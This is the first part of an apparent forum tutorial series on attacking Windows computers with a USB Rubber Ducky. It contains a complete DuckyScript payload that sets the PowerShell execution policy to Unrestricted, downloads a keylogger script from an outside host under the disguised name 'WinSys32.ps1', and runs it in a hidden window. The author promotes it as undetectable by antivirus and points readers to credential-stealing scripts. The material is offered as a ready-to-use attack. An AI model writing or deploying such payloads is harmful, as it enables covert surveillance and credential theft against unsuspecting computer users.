At the end of this small series you should be able to write your own Scripts for hacking the box just with an USB Stick and without the need of knowledge of any programming language!
Part 1: How to use DuckyScript for writing a FUD file downloader & executor
Part 2: How to use Powershell (Microsofts new shell; reminds of the linux terminal) for writing a FUD KeyLogger [Bonus]
Part 3: How to build your own BadUSB for around 10$
USB Rubber Ducky
[quote]“If it quacks like a keyboard and types like a keyboard, it must be a keyboard.”
~ Rubber Ducky Wiki[/quote]
This little quote tells us the main idea behind Bad USB. It’s a technique to convince the computer that we are not a USB Stick (Which can’t execute things on his own), but a completly normal and unsuspicious keyboard, controlled by the user. This is useful, because keyboards have the right to type (Wow, big surprise ).
[quote]“Humans use keyboards, and computers trust humans.”
~ Rubber Ducky Wiki[/quote]
The computer thinks we’re a normal user, who just wants to download a file via powershell. That’s not something disallowed, so it goes pretty unnoticed. If any warnings pop up, like “Don’t trust files from the internet”, we just press Enter and skip’em, because the keyboard rules!
Do I need the Rubber Ducky?
I recommend using a Rubber Ducky for the following stuff, but it’s not required. In the third part I’ll explain how to build your own Bad USB for about 10$! Anyway, this one will be much harder to reprogram and to work with, so I highly recommend you to buy a Rubbber Ducky, when you are hooked .
You can get it for 44.99$ at Hak5hop. The decision is yours .
DuckyScript - Introduction
Now we’ve got an USB Stick with a personality disorder, which thinks it’s a keyboard, but how does it know what it has to do on the target system? The answer is a script language, called DuckyScript. It’s syntax is pretty straightforward, it’s requirements are nearly not existent and the needed intelligence is just ridiculous .
- Any text editor
I think you’ll find one… gedit, Windows editor, vim, etc…
The default Duckencoder.jar can be found at github. However, I’ve had some problems due to different keyboard layouts and searched for an alternative, so I stumbled upon this thread. There you can download a custom version of the Duckencoder, which supports different keyboard layouts.
DuckyScript - Our Script
I’ll cover just the basics and not all the keys you can use, because they can be already found here.
- You have to write every command on a new line
- Don’t use blank lines (Never read it, but they seemed to break my script )
- Use REM for comments
- Use STRING for typing normal letters (It presses automatically shift, when you use upper-case letters and symbols like !"§$)
- Use GUI for pressing the Windos key
- Use ENTER for pressing ENTER (Wow, that’s insane)
- Use DELAY for waiting between new commands
That’s all, what I’ve needed for writing my downloader & executor script!
Example Powershell Script Downloader & Executor
REM Set Execution Policy DELAY 2000 GUI r DELAY 300 STRING powershell ENTER DELAY 4000 STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted ENTER DELAY 1000 STRING J ENTER DELAY 300
First we set the Powershell
ExecutionPolicy Setting to
Unrestricted, so that our script can be executed on the target system. Maybe you’ve noticed that we just change the CurrentUsers setting. This requires no special privileges and works as good as changing the whole machines settings.
REM Download Keylogger STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1") ENTER DELAY 2000 STRING exit ENTER DELAY 300
Next we’re downloading the Powershell Script. This one uses the .Net WebClient, which can be called from within Powershell (During my little journey through Keyloggers I’ve found Powershell just awesome; I highly recommend everyone to have a look at it. Maybe I’ll make some basic tutorials about it in the future ). The command Downloads the file from the given Web-site, where you’ve put the script (http://example.net/keylogger.ps1) and saves them under the given directory (As an example I use the current directory (Users directory) and the name “WinSys32.ps1”). Then we leave the Powershell console.
REM Run Keylogger GUI r DELAY 300 STRING powershell -windowstyle hidden ./WinSys32.ps1 ENTER
Finally we run the Script as a background powershell process. This has two big advantages:
- The user can’t spot it easily
- It runs under the name “Windows Powershell” with the default Powershell Icon. No user will think his own windows spys on him . (Oh, and AVs don’t care either; more on that in the next part)
Here’s the full script, so that you don’t have to put the pieces together .
REM Download & Execute Powershell Script REM ~ TheDoctor v126.96.36.199 REM Set Execution Policy DELAY 2000 GUI r DELAY 300 STRING powershell ENTER DELAY 4000 STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted ENTER DELAY 1000 STRING J ENTER DELAY 300 REM Download Keylogger STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1") ENTER DELAY 2000 STRING exit ENTER DELAY 300 REM Run Keylogger GUI r DELAY 300 STRING powershell -windowstyle hidden ./WinSys32.ps1 ENTER
How To Put That Script On Your Bad USB?
With the USB Rubber Ducky it’s very easy. Just take the Micro-SD card, put it in a Micro-SD to SD adapter and plug it in your computer. Then build the script with the Duckencoder:
Or when you want to compile with a specified keyboard layout (Only possible with the modified Duckencoder)
-i is the input file
-o is the output file
-l is the keyboard layout (Check the link to the thread for all possible layouts)
Now copy the inject.bin (No other name is allowed! The script has to be named inject.bin) to the Micro-SD card and plug it back into your Rubber Ducky. Finished.
With Bad USB it’s much more complicated, so I’ll explain it in the third part of the series.
You can find many different DuckyScripts here. It’s a good place to search for some techniques you can use, when writing your own scripts (Or to find scripts for trolling your friends, e.g. this one ). There are some very interesting ones like mimikatz, utilman exploit or a WIFI password grabber.
Is it really that easy? Yes. Just write your own simple DuckyScript, plug in your Bad USB and… It’s won . Oh, and don’t forget that you feel like a real 1337 h4xx0r, when you just have to put in your Stick and see magically popping up windows, filling with commands without anyones interaction .
In the next part we’ll talk about the Powershell Script, you have to download. Don’t expect a big introduction to Powershell, because I’m just a beginner, but I’m looking forward to explain you some basics.